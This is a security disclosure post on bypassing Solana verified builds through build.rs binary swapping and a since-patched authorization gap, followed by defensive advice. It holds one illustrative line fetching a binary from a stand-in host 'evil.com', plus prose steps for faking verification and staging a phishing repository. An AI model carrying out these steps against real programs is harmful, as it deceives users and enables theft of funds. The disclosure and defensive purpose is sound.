How We Hacked Solana Verified Builds



On November 20, 2024, we got the official Solana Explorer to display a green Program Source Verified badge for a repository we controlled that had nothing to do with the program it claimed to verify.

The target we chose? The verification program itself.

Hashes matched. Badge displayed. Repository: ours.

This was not the first time Solana verified builds had been broken. I had done it before in 2023, against the old Anchor AVB system, while working at Neodyme. Same class of bug, different implementation, bigger impact.

This post explains both attacks, what was fixed, what remains fundamentally broken, and why it matters for everyone building or using programs on Solana.

Why verified builds exist

Solana programs live on-chain as compiled SBF bytecode. That is what validators execute. It is not what anyone wants to read.

When a team says "here's our source code," the natural question is:

Does this source code actually produce the thing deployed on-chain?

Without verified builds, you have no way to check. You are trusting a GitHub link. Maybe the repo is real. Maybe the team deployed from a different branch. Maybe the code was changed after the audit. Maybe it is a completely different program. You cannot tell by looking at the chain.

Verified builds are supposed to close that gap. The Solana documentation describes the system as a pipeline that compares the hash of the on-chain program with the hash of an executable built from a public repository at a specific commit, using Docker-based build environments for determinism. The metadata (program address, git URL, commit hash, build arguments) is stored in an on-chain PDA so anyone can independently reproduce the verification. Explorers like Solana Explorer and SolanaFM use APIs around this flow to show verification status.

The mental model is straightforward:

- Take a public repository at a specific commit.

- Build it in a fixed environment.

- Hash the output.

- Compare to what is on-chain.

- If they match, the source explains the deployment.
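
The last three steps of that list can be sketched in a few lines. This is a minimal illustration, not the real pipeline: the `VerificationClaim` fields and the function names are our own, and `digest` is a non-cryptographic FNV-1a stand-in so the example needs no external crates. A real verifier would use a cryptographic hash.

```rust
/// Metadata a verification claim carries. Field names are illustrative only.
#[derive(Debug, Clone, PartialEq)]
pub struct VerificationClaim {
    pub program_id: String,
    pub repo_url: String,
    pub commit: String,
    pub build_args: Vec<String>,
}

/// FNV-1a (64-bit): a NON-cryptographic stand-in for a real hash such as
/// SHA-256, used here only to keep the sketch dependency-free.
pub fn digest(bytes: &[u8]) -> u64 {
    let mut hash: u64 = 0xcbf2_9ce4_8422_2325;
    for byte in bytes {
        hash ^= u64::from(*byte);
        hash = hash.wrapping_mul(0x0000_0100_0000_01b3);
    }
    hash
}

/// Hash the build output, hash the on-chain bytes, compare.
pub fn hashes_match(built: &[u8], on_chain: &[u8]) -> bool {
    digest(built) == digest(on_chain)
}

/// Turn the comparison into the statement a verifier would publish.
pub fn report(claim: &VerificationClaim, built: &[u8], on_chain: &[u8]) -> String {
    let verdict = if hashes_match(built, on_chain) {
        "matches"
    } else {
        "does NOT match"
    };
    format!(
        "{}@{} {} program {}",
        claim.repo_url, claim.commit, verdict, claim.program_id
    )
}
```

Note what the functions take as input: bytes. Nothing in the comparison knows how `built` was produced.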

It is a core root of trust when interacting with blockchain programs.

But it only works if you cannot make it lie.

The first time: Anchor verified builds, 2023

In 2023, Solana Explorer had an Anchor: Verified label. It came from the Anchor Program Registry, where developers could publish source code and have it linked to deployed programs. That system was eventually deprecated. A March 2023 Explorer pull request was literally titled "Remove verified label," with the comment "Anchor program registry is deprecated."

The old Anchor verifiable build model used Docker to make builds reproducible. The idea, as described in Anchor's own documentation, is that building with the Solana CLI can embed machine-specific code, so building inside a Docker image with pinned dependencies produces a deterministic result.

I looked at this and noticed something the designers had not fully accounted for.

Rust builds are not pure

On the surface, verified builds sound like a pure function: source code goes in, bytecode comes out, hash it, compare. Clean.

But Rust builds are not pure. They execute code.

The most direct example is build.rs. If a Cargo package contains a file named build.rs in the root, Cargo compiles and executes that file before building the rest of the package. This is not hidden or obscure. The Cargo documentation explicitly says that build scripts can perform arbitrary tasks, including network access, code generation, and influencing compilation through Cargo instructions.

Build scripts are a completely legitimate feature. They handle code generation, native library detection, platform-specific configuration, protobuf compilation, and a hundred other real use cases. No one is going to remove them from Rust.

But from a verified build perspective, this changes everything.

If the verifier builds untrusted code, and the build process can execute arbitrary logic, then the source code is not just input to the build. It is also code running inside the verifier.
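
To make that concrete, here is a harmless sketch of what the body of a build script can look like. The function name `build_step` and the generated file are hypothetical. In an actual build.rs this logic would sit inside `fn main()`, which Cargo compiles and runs before compiling the package.

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};

/// What a build script's `main` might do. Cargo passes the output directory
/// to build scripts in the `OUT_DIR` environment variable, so a real build.rs
/// would call something like:
///     build_step(Path::new(&std::env::var("OUT_DIR").unwrap())).unwrap();
pub fn build_step(out_dir: &Path) -> io::Result<PathBuf> {
    // Arbitrary logic runs here with the privileges of the build process.
    // This sketch only generates a source file. Nothing in the language stops
    // a script from reading other files or opening sockets instead.
    let generated = out_dir.join("generated.rs");
    fs::write(&generated, "pub const BUILT_BY_SCRIPT: bool = true;\n")?;

    // Lines printed to stdout in this form are instructions to Cargo.
    println!("cargo:rerun-if-changed=build.rs");
    Ok(generated)
}
```

Everything in that function is ordinary Rust with full access to the standard library. That is the whole point.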

I wrote a proof of concept. The attack was simple:

- Create a repository with a build.rs that runs during compilation.

- The build script fetches or embeds the real on-chain program executable.

- After the normal compilation finishes, the script replaces the freshly compiled binary with the pre-existing on-chain binary.

- The verifier hashes the output and compares to the chain.

- Hashes match. Verification passes.

The verifier thought it had proved that the readable source code compiled into the on-chain program.

It actually proved something much weaker:

Running this repository's build process inside the verifier produced the same bytes as the on-chain program.

Those are very different claims.
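
A toy model shows the gap. Everything here is an assumption made for illustration: `compile` is a stand-in for a compiler, the two build functions are hypothetical, and the verifier compares bytes directly rather than hashes, which is equivalent for this purpose.

```rust
/// Stand-in for a compiler: deterministic bytes derived from the source text.
pub fn compile(source: &str) -> Vec<u8> {
    source.bytes().rev().collect()
}

/// Honest build process: the output depends only on the readable source.
pub fn honest_build(source: &str) -> Vec<u8> {
    compile(source)
}

/// Tampered build process: compiles the readable source, then discards the
/// result and emits bytes the repository embedded or fetched.
pub fn tampered_build(source: &str, embedded: &[u8]) -> Vec<u8> {
    let _ignored = compile(source);
    embedded.to_vec()
}

/// The verifier only sees output bytes, so both processes look the same to it.
pub fn verifier_accepts(build_output: &[u8], on_chain: &[u8]) -> bool {
    build_output == on_chain
}
```

With `on_chain = compile("fn real_program() {}")`, an honest build of unrelated decoy source is rejected, while `tampered_build` of the same decoy source is accepted. The verifier's check is identical in both cases.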

"But you can see the build.rs"

This is the first objection everyone raises. "Just look at the build scripts."

Sure, if the malicious build.rs is in the root of the project and contains reqwest::get("evil.com/real_binary"), someone reviewing the repo might catch it.

But the build script does not have to be in the top-level crate. It can live in a dependency. Or a dependency of a dependency. It can be in a crate named solana-program-utils or borsh-derive-internal or something else that looks completely innocent. It can be combined with legitimate build logic so that the malicious part is one line in a file that also does real work.

And build scripts are not even the only vector. Procedural macros have the same property. The Rust Reference explicitly states that procedural macros run during compilation, have access to the same resources as the compiler, and carry the same security concerns as build scripts.

So the attack surface for build-time code execution in Rust includes:

- build.rs in any crate in the dependency tree

- procedural macro crates

- build dependencies ([build-dependencies])

- code generated during compilation

- native build steps (cc, cmake, etc.)

- anything else Cargo runs before producing the final artifact
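
Some of these show up in a crate's Cargo.toml. The sketch below flags three of them with a naive line-based scan. The struct and function names are hypothetical, and a real tool should parse TOML properly rather than match lines. It also cannot see a build.rs that Cargo picks up automatically from the package root, since that needs no manifest entry at all.

```rust
/// Build-time hooks that can be spotted in a single Cargo.toml.
#[derive(Debug, Default, PartialEq)]
pub struct BuildHooks {
    /// A `[build-dependencies]` table (plain or target-specific) is present.
    pub has_build_dependencies: bool,
    /// The crate declares `proc-macro = true`.
    pub is_proc_macro: bool,
    /// The manifest points `build = "..."` at a custom script path.
    pub explicit_build_key: bool,
}

/// Naive scan: strips comments and whitespace, then matches known patterns.
pub fn scan_manifest(manifest: &str) -> BuildHooks {
    let mut hooks = BuildHooks::default();
    for raw in manifest.lines() {
        // Removing whitespace makes `proc-macro = true` and `proc-macro=true`
        // look alike. A `#` inside a quoted string would confuse this.
        let line: String = raw
            .split('#')
            .next()
            .unwrap_or("")
            .split_whitespace()
            .collect();
        if line.starts_with('[') && line.contains("build-dependencies") {
            hooks.has_build_dependencies = true;
        } else if line == "proc-macro=true" {
            hooks.is_proc_macro = true;
        } else if line.starts_with("build=\"") {
            hooks.explicit_build_key = true;
        }
    }
    hooks
}
```

Run over every manifest in a dependency tree, a scan like this gives a first list of places to read. It does not tell you whether any of them is malicious.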

A project with 200 dependencies has hundreds of potential locations for build-time code. Nobody audits all of them before running cargo build. For more on how hidden code in dependencies can be used as backdoors, see Tip #77 in our 100 Solana tips.

That was lesson one.

The fix that wasn't

After the 2023 issue, the Anchor verified label was removed from Explorer. The system was deprecated.

But the underlying problem was not "Anchor's implementation was bad." The underlying problem was that Rust's build model makes pure verification hard.

When Solana verified builds came back in November 2024, they came back with better tooling, better infrastructure, and official integration. The pipeline was now maintained by Ellipsis Labs and OtterSec, with the verification API hosted by OtterSec and consumed by explorers including Solana Explorer.

The build-time code execution issue was still there, because it is inherent to how Rust projects compile.

But there was a new problem on top of it.

The second time: November 2024

When we tested the new system, we found that the build-system exploitation still worked. That was not surprising. You cannot stop build.rs from running without breaking real projects.

What was surprising was the authorization model.

The system allowed anyone to submit verification information for any program.

You could pick any program on Solana: a DeFi protocol, a token program, a bridge, anything. Write a repository that tricks the build into producing the right hash, submit it for verification, and have the official explorer show your repository as the verified source.

We did not pick a random test program. We picked the verification program itself. OtterSec's own on-chain program that stores verification metadata.

We submitted our fake repository. The builder ran our code. Our build script ensured the output matched the on-chain hash. The API accepted it. Explorer displayed the badge.

Program Source Verified.

Repository: accretion-xyz/unverified.

The irony was deliberate.

Why this was actually dangerous

This is not an abstract build-system nerd problem.

A verified build badge on the official Solana Explorer is a trust signal. People act on it. Wallets integrate with it. Auditors use it to find source. Developers use it to find SDKs. Users use it to decide whether something is legitimate.

Consider the attack scenario:

- Find a popular on-chain program that does not have a verified source attached yet.

- Create a repository that tricks the build into reproducing the on-chain hash.

- Submit it for verification.

- The official explorer now shows your repository as the verified source.

- Fill the README with convincing documentation.

- Link to a phishing frontend.

- Publish a malicious SDK.

- Add "setup" instructions that ask users to do dangerous things.

- Wait.

Users searching for the program's source on Explorer would find your repository. It has the green badge. It says "verified." They have no reason to suspect it is not the real source.

And here is the critical insight that makes this worse than a simple build-system bug:

The repository is more than build input. It is a trust surface.

A README can steal funds without changing the on-chain program. A frontend link can drain wallets. A malicious SDK can compromise every integrator who installs it. Fake documentation can trick developers into constructing vulnerable transactions.

The executable hash says nothing about any of that. For a related attack on program metadata trust, see our post on hidden IDL instructions, where we showed that anyone could upload a fake IDL for programs they don't control.

Even in a weaker version of this attack, one where the repository genuinely compiles to the correct program, a random third party should not be able to overwrite the canonical source link shown by the official explorer. The source link is part of the program's public identity. It is what users click when they want to understand what they are interacting with.

So the bug was really two things stacked:

- Build-time code execution allowed a fake repository to produce a matching hash.

- Missing authorization allowed anyone to submit that fake verification for any program.

The combination was lethal.

Disclosure and fix

We disclosed the issue the same day the new system was released. The Solana Foundation investigated and patched the system.

The fix addressed the authorization problem, which was the most immediately exploitable part.

The solana-verifiable-build v0.4.0 release notes describe the issue directly. They say the OtterSec API had previously allowed anyone to override a program's verification info with a clone of the program's repository, which could mislead users about protocol information. The patch requires that verification data be written to an on-chain PDA before remote verification begins, and that verification status is tagged with the uploader's address so explorers and applications can decide what is canonical. The release notes recommend trusting PDAs uploaded by the program's upgrade authority or OtterSec's signer.

The Solana verified build CLI README now says the legacy --remote flow is deprecated, and instructs users to upload the PDA with the program's upgrade authority before submitting a remote verification job to OtterSec's worker.

The current Solana documentation says that while someone else can verify your program, the verification is only considered valid if the signer is the program's upgrade authority.

That was the right fix for the authorization problem.

The system now answers two questions instead of one:

- Does this build output match the on-chain program? (cryptographic)

- Who is claiming this repository is the canonical source? (authorization)

If the uploader is not the program authority, explorers and wallets can treat it differently or ignore it entirely.
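
On the consumer side, that decision could look roughly like this. It is a sketch under our own assumptions: the `Verification` struct, the `Trust` variants, and the string-typed addresses are hypothetical and do not mirror the on-chain PDA layout or the OtterSec API.

```rust
use std::collections::HashSet;

#[derive(Debug, PartialEq)]
pub enum Trust {
    /// Hash matched and the claim was signed by the program's upgrade authority.
    Canonical,
    /// Hash matched and the signer is on the viewer's explicit allow-list.
    TrustedThirdParty,
    /// Hash matched, but the signer has no authority over the program.
    Unendorsed,
    /// The build output did not match the on-chain program at all.
    HashMismatch,
}

/// One verification claim as an explorer or wallet might see it.
pub struct Verification<'a> {
    pub signer: &'a str,
    pub hash_matches: bool,
}

/// `upgrade_authority` is `None` for a program whose authority was removed.
pub fn classify(
    v: &Verification<'_>,
    upgrade_authority: Option<&str>,
    trusted: &HashSet<&str>,
) -> Trust {
    if !v.hash_matches {
        Trust::HashMismatch
    } else if upgrade_authority == Some(v.signer) {
        Trust::Canonical
    } else if trusted.contains(v.signer) {
        Trust::TrustedThirdParty
    } else {
        Trust::Unendorsed
    }
}
```

The key design choice is that a matching hash alone never yields `Canonical`. A stranger with a matching build lands in `Unendorsed`, and the UI decides what, if anything, to show for that.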

What remains unfixed

The authorization bug was patched.

The build-system trust issue remains.

This is not because anyone forgot about it. It remains because Rust builds legitimately execute code, and you cannot disable that without breaking real projects.

A verified build of a normal Rust project may execute:

- build scripts in the root crate

- build scripts in every dependency that has one

- procedural macros

- native compilation steps (cc crate, cmake crate, etc.)

- code generators

- toolchain-level behavior

- environment-dependent build logic

- filesystem access inside the container

- network access, unless the container explicitly blocks it

A Docker container gives you determinism. It does not give you safety. Running untrusted code in a container still means running untrusted code.

The official Solana documentation is admirably honest about this. It says verified builds should not be considered more secure than unverified builds. It says the default setup is not completely trustless because Docker images are built and hosted by the Solana Foundation. It warns that the project gets copied into the Docker image, potentially including sensitive information. It notes that for remote verification, users are trusting the OtterSec API and Solana Explorer to some degree, and that either could display incorrect information if compromised. It explicitly suggests building Docker images yourself or running verification locally if you want a more trustless setup.

That is the right framing.

A verified build is not a magic badge that means "safe."

It is a narrow claim:

Under this build environment, using this metadata, this repository produced an executable whose hash matches the on-chain program.

That is useful. But it is weaker than most users assume when they see a green checkmark.

What you should actually check

If you are relying on verified builds for security decisions, as a user, auditor, integrator, or wallet developer, here is the condensed version of what matters.

Check who made the claim. The most important question is not "is there a verification?" but "who submitted it?" The canonical verification should come from the program's upgrade authority or a signer you explicitly trust. The Solana deployment docs define the upgrade authority as the account that can update or close the program; removing it with the --final flag makes the program immutable. (Solana) If the verifier is some random address, treat the verification skeptically. For a full framework on structuring and securing these authorities, see our post on designing better authority structures.

Check the exact repository and commit. Do not just glance at the GitHub org name. Verify the repository URL, the commit hash, whether the commit belongs to the official project, whether the repo was recently created, and whether it links to the project's real domain and communication channels.

Reproduce locally. The docs describe a local verification flow using solana-verify verify-from-repo with the program ID, repository URL, and commit hash. (Solana) Run this in a disposable environment. Not on a machine with wallet keys, deploy keys, or production credentials. Remember: the build will execute code from that repository.

Inspect build-time code. Before trusting that the source explains the binary, check what runs during the build. Look for build.rs, procedural macro crates, [build-dependencies], generated code, native build steps, vendored blobs, and unusual dependency patches or git dependencies. Most build scripts are boring. But if your goal is to understand whether the readable code is what actually produced the binary, build-time execution is exactly where the gap hides.
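
A small helper can produce the first reading list. The sketch below walks a directory and collects every file named build.rs. The function name is ours, and it only covers sources that are present under `root`, so dependency sources need to be in the tree first (for example via `cargo vendor`). It will also miss scripts that a manifest renames through the `build` key.

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};

/// Recursively collect every file named `build.rs` under `root`.
/// Symlinks are not followed, which avoids cycles.
pub fn find_build_scripts(root: &Path) -> io::Result<Vec<PathBuf>> {
    let mut found = Vec::new();
    let mut pending = vec![root.to_path_buf()];
    while let Some(dir) = pending.pop() {
        for entry in fs::read_dir(&dir)? {
            let entry = entry?;
            let file_type = entry.file_type()?;
            let path = entry.path();
            if file_type.is_dir() {
                pending.push(path);
            } else if file_type.is_file()
                && path.file_name().and_then(|name| name.to_str()) == Some("build.rs")
            {
                found.push(path);
            }
        }
    }
    // Sort so the output is stable across runs and filesystems.
    found.sort();
    Ok(found)
}
```

Reading this code does not execute anything from the repository, which is what you want at this stage. The build itself is the part that runs their code.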

Treat everything outside the binary as untrusted. The hash verification covers the executable. It says nothing about the README, the frontend links, the SDK, the npm packages, the setup instructions, or the Discord links. Those are separate trust surfaces. A repository can pass verification and still contain malicious off-chain content.

Lessons for verified build systems

A few things generalize beyond Solana.

Compilation is not passive. Modern build systems execute code. Treat every verified build as running attacker-supplied logic in a container. Design around that assumption.

Reproducibility and authorization are separate problems. A third party can reproduce a build. That does not mean they should be allowed to attach a canonical repository link to someone else's program. The fact that you can build something does not grant you authority over its public identity.

Sandboxing must be real. No root. No network unless explicitly required. No host secrets. Minimal images. Artifact paths that are hard to tamper with. Output validation that goes beyond file existence.
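
As one possible starting point, here is a sketch that assembles a locked-down `docker run` invocation. It only builds the argument list and executes nothing. The function name, the mount points, and the numeric user are our assumptions, and this is not how solana-verify invokes Docker. With networking disabled, dependencies have to be vendored or pre-fetched, and with a read-only source mount the lockfile must already exist.

```rust
/// Assemble arguments for `docker run` with a restrictive default posture.
/// The caller supplies the image and the build command.
pub fn sandboxed_run_args(
    image: &str,
    repo_dir: &str,
    out_dir: &str,
    build_cmd: &[&str],
) -> Vec<String> {
    let mut args: Vec<String> = vec![
        "run",
        "--rm",
        "--network", "none",                    // no network access
        "--cap-drop", "ALL",                    // drop all Linux capabilities
        "--security-opt", "no-new-privileges",  // block privilege escalation
        "--user", "1000:1000",                  // do not run as root
        "--workdir", "/work",
    ]
    .into_iter()
    .map(String::from)
    .collect();

    // Source is mounted read-only; artifacts go to a separate writable mount.
    args.push("--volume".to_string());
    args.push(format!("{}:/work:ro", repo_dir));
    args.push("--volume".to_string());
    args.push(format!("{}:/out", out_dir));
    args.push("--env".to_string());
    args.push("CARGO_TARGET_DIR=/out".to_string());

    args.push(image.to_string());
    args.extend(build_cmd.iter().map(|part| part.to_string()));
    args
}
```

This limits what build-time code can reach. It does not stop that code from tampering with the artifact it is allowed to write, so output validation is still a separate problem.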

Metadata outside the binary still matters. A verified executable hash does not protect users from a malicious README, a phishing frontend, or a compromised SDK. Verification systems that display source links should distinguish "this build matched" from "this repository is endorsed by the program's owner."

UI should expose the trust model. Do not just say "Verified." Say who verified it. Show whether that signer is the program authority. Show the commit. Show whether the program is upgradeable. Let users make informed decisions instead of trusting a green badge.

Conclusion

We think Solana needs verified builds. We are not trying to kill the system. We tested it because we wanted it to be good.

The state of things before verified builds was worse: users trusting random GitHub links and project documentation with no cryptographic relationship to the on-chain program. Verified builds are the right tool for connecting bytecode to source.

But they are security-critical infrastructure. When explorers show a badge, users trust it. When wallets integrate verification data, it becomes part of the signing flow. When auditors use verified source as their starting point, it becomes part of the security supply chain.

In 2023, I broke Solana verified builds because the build environment executed untrusted code from the repository being verified. The source could make the build lie.

In 2024, we broke the new system at Accretion because anyone could attach misleading verification metadata to programs they did not control. Authorization was missing.

The authorization bug has been fixed. No bounty was ever paid, despite the issue being acknowledged in the official release notes. That is fine. We did not do this for the money.

The build-time execution issue is a deeper constraint that will not go away as long as Rust has build scripts and procedural macros. That is not a failing of the current maintainers. It is a hard problem that requires users to understand what "verified" actually means.

A verified build means: this repository, at this commit, under this build process, produced this hash.

It does not mean the code is safe. It does not mean the repository is trustworthy. It does not mean the README is honest. It does not mean the frontend is real.

The badge is useful.

Just know what it actually proves.